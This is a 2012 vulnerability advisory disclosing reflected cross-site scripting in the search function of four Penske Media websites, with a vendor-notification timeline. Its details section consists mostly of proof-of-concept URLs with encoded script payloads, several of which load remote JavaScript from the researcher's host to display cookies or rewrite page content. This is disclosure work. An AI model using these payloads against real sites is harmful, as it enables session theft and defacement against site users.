----------------------------------------------------------------------------------------------------
Title		: Penske Media Corporation reflected Cross Site Scripting  (XSS) vulnerabilities

Vendor		: Penske Media Corporation (http://www.pmc.com/)

Description	: Multiple PMC web-sites are vulnerable to reflected Cross-site Scripting attacks

Advisory time-line:
----------------------------------------------------------------------------------------------------
- Vendor notified		: 16-Oct-2012, 9-Nov-2012, 15-Nov-2012 - no responses
- Packet Storm advisory	: 20-Nov-2012

Test environment
----------------------------------------------------------------------------------------------------
- Latest Firefox browser

Vulnerable PMC sites
----------------------------------------------------------------------------------------------------
- Variety.com
- La411.com
- newyork411.com
- deadline.com


Details
----------------------------------------------------------------------------------------------------
Affected functionality: site search

Test #1: Remote Javascript execution: display browser cookie
http://www.variety.com/search/?key=%3C/script%3E%3Cscript%20src=http://idash.net/xs.js%3E%3C/script%3E
http://www.la411.com/search/index.cfm?searchParam=%3C%2Fscript%3E%3Cscript+src%3Dhttp%3A%2F%2Fidash.net%2Fxs.js%3E%3C%2Fscript%3Ei&x=0&y=0
http://www.newyork411.com/search/index.cfm?searchParam=%22%3E%27%3E%3Cscript+src%3Dhttp%3A%2F%2Fidash.net%2Fxs.js%3E%3C%2Fscript%3Ei&x=0&y=0
http://www.deadline.com/?s=%22%3E%27%3E%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fidash.net%2Fxs.js%3E%3C%2FSCRIPT%3E

Test #2, Remote Javascript execution: overwrite HTML content
http://www.variety.com/search/?key=%3C/script%3E%3Cscript%20src=http://idash.net/fr.js%3E%3C/script%3E
http://www.la411.com/search/index.cfm?searchParam=%3C%2Fscript%3E%3Cscript+src%3Dhttp%3A%2F%2Fidash.net%2Ffr.js%3E%3C%2Fscript%3Ei&x=0&y=0
http://www.newyork411.com/search/index.cfm?searchParam=%22%3E%27%3E%3Cscript+src%3Dhttp%3A%2F%2Fidash.net%2Ffr.js%3E%3C%2Fscript%3Ei&x=0&y=0
http://www.deadline.com/?s=%22%3E%27%3E%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fidash.net%2Ffr.js%3E%3C%2FSCRIPT%3E

Test #3, Simple alert
http://www.variety.com/search/?key=%3C/script%3E%3Cscript%3E+-+-1-+-+alert%28/XSS/%29%3C/script%3E
http://www.la411.com/search/index.cfm?searchParam=%22%3E%27%3E%3Cimg+src%3Dx+onerror%3Dprompt%28/XSS/%29%3E&x=0&y=0
http://www.newyork411.com/search/index.cfm?searchParam=%22%3E%27%3E%3Cimg+src%3Dx+onerror%3Dprompt%28/XSS/%29%3E&x=0&y=0
http://www.deadline.com/?s=%22%3E%27%3E%3CSCRIPT%3Eprompt%28/XSS/%29%3C%2FSCRIPT%3E


Note: the test cases are not malicious.

Researcher
----------------------------------------------------------------------------------------------------
Janne Ahlberg 
Project site: http://idash.net
Twitter: https://twitter.com/JanneFI
----------------------------------------------------------------------------------------------------